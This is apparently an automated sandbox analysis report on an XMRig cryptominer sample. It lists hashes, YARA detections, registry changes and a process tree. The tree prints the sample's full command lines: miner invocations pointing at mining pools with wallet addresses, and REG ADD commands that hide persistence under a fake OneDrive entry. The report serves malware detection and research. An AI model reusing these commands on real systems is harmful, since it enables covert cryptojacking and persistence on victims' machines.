Analysis
max time kernel: 149s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
submitted: 25-12-2024 13:37
Static task: static1
Behavioral task: behavioral1
  Sample: JaffaCakes118_e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9.exe
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: JaffaCakes118_e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9.exe
  Resource: win10v2004-20241007-en
General
Target: JaffaCakes118_e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9.exe
Size: 796KB
MD5: 6eeac2d35e80994362ed079c11db5c81
SHA1: 04008758fbc4a294fc8351a6fa1b10870d97afc9
SHA256: e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9
SHA512: e372b6b7b24d409fc93cc257889c85e4cf72e1340d98ac24b64ad983c8d63929ea7d55b4cfbd9300523a198f18caf08746556bcfbc853bef1a1da2f609e3f379
SSDEEP: 24576:4G0N+xjC15Vdj4E/gA2AUOfrFQpbswwwwwYs82ugb3tdvE:d0N+xjC1Ddj4E/rHFQpbswwwwwYszuyI
Malware Config
Signatures
Xmrig family

XMRig Miner payload (7 IoCs)
resource | yara_rule
behavioral2/memory/3356-44-0x0000000140000000-0x00000001407DD000-memory.dmp | xmrig
behavioral2/memory/3356-45-0x0000000140000000-0x00000001407DD000-memory.dmp | xmrig
behavioral2/memory/3356-47-0x0000000140000000-0x00000001407DD000-memory.dmp | xmrig
behavioral2/memory/3356-50-0x0000000140000000-0x00000001407DD000-memory.dmp | xmrig
behavioral2/memory/3356-49-0x0000000140000000-0x00000001407DD000-memory.dmp | xmrig
behavioral2/memory/3356-51-0x0000000140000000-0x00000001407DD000-memory.dmp | xmrig
behavioral2/memory/3356-48-0x0000000140000000-0x00000001407DD000-memory.dmp | xmrig

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | JaffaCakes118_e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9.exe

Executes dropped EXE (1 IoC)
pid | Process
224 | OneDrive.exe

Loads dropped DLL (1 IoC)
pid | Process
224 | OneDrive.exe

Adds Run key to start application (2 TTPs, 1 IoC)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" | REG.exe

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
4 | ipinfo.io

Suspicious use of SetThreadContext (2 IoCs)
description | pid | Process | procid_target
PID 224 set thread context of 1996 | 224 | OneDrive.exe | 87
PID 224 set thread context of 3356 | 224 | OneDrive.exe | 94

yara rule upx (2 IoCs)
resource | yara_rule
behavioral2/memory/1996-42-0x0000000140000000-0x0000000142B59000-memory.dmp | upx
behavioral2/memory/1996-43-0x0000000140000000-0x0000000142B59000-memory.dmp | upx
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | REG.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | JaffaCakes118_e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | REG.exe
Modifies registry key (1 TTP, 2 IoCs)
pid | Process
1088 | REG.exe
2916 | REG.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Suspicious use of AdjustPrivilegeToken (2 IoCs)
description | pid | Process
Token: SeLockMemoryPrivilege | 3356 | conhost.exe
Token: SeLockMemoryPrivilege | 3356 | conhost.exe

Suspicious use of FindShellTrayWindow (1 IoC)
pid | Process
3356 | conhost.exe
Suspicious use of WriteProcessMemory (42 IoCs)
Processes
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9.exe"
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID: 2244

  C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
    Command line: "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID: 224

    C:\Windows\system32\svchost.exe
      Command line: C:\Windows\system32\svchost.exe --algo TON --pool wss://pplns.toncoinpool.io/stratum --user EQAWGzcmciTEXnXdAxgH2GiJGMGMG0MVICewpEaRsmtq5ARO.EasyMiner
      PID: 1996

    C:\Windows\system32\conhost.exe
      Command line: C:\Windows\system32\conhost.exe -o xmr.2miners.com:2222 -u 492JEFQduhwhefpsGy7GWe5rhJo977ePh9xEMpfbmSs8YyjbTKuFcXTQyBoEdQeZdwaUigNXhascMKr6DDQkhNspBCjRG4R -p "EasyMiner"
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      PID: 3356

  C:\Windows\SysWOW64\REG.exe
    Command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID: 1088

  C:\Windows\SysWOW64\REG.exe
    Command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v OneDrive /t REG_BINARY /f /d 020000000000000000000000
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID: 2916
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 238B
MD5: e12f93fc9f23ce507bd15a331b736823
SHA1: a08bfe34dd0be13b43f835cb4ff4570fec1a27e2
SHA256: bf9281b20d4502ee35f7ef0a8f3b88b5d52c4ff1965be227f5b37490eade23d5
SHA512: d727f6ad035941630234f5d18d2b05eb0fec55ee3f745021504bed23277e644dc2e1f6bc03fd734b27ac9469e1f440767dc0712b603af2885823aa2b0999045c

Filesize: 175KB
MD5: f3af73070387fb75b19286826cc3126c
SHA1: 7774854137d7ada89f3b4bdf67631456a1e74853
SHA256: 974243f2487ceeb8eeea6aa8fee215f15c7b204382d4bd12f469f712f56c3610
SHA512: a620583b2d89e3f0350ae4d5dfe2b2c160d2f982b29dea6b8e273bb39ab2d1d91a2452238e9c30cdd7151aa555e231e1ac9930f9d76f6ff80504eacb25fa557a

Filesize: 316KB
MD5: fed6517a5f84eecc29edee5586d7feeb
SHA1: 56df244bf73c7ec7b59c98e1f5d47b379b58a06b
SHA256: 5075a0587b1b35c0152d8c44468641d0ab1c52fd8f1814ee257eceb9ffcb89b6
SHA512: 45cab4395d509b5d7dfb904e84d5a679440412f494c4970191b5882572f4d1b9c9cd28d41a49619353c405c2477153b4a7a1568fcf307709df0b81b38c405642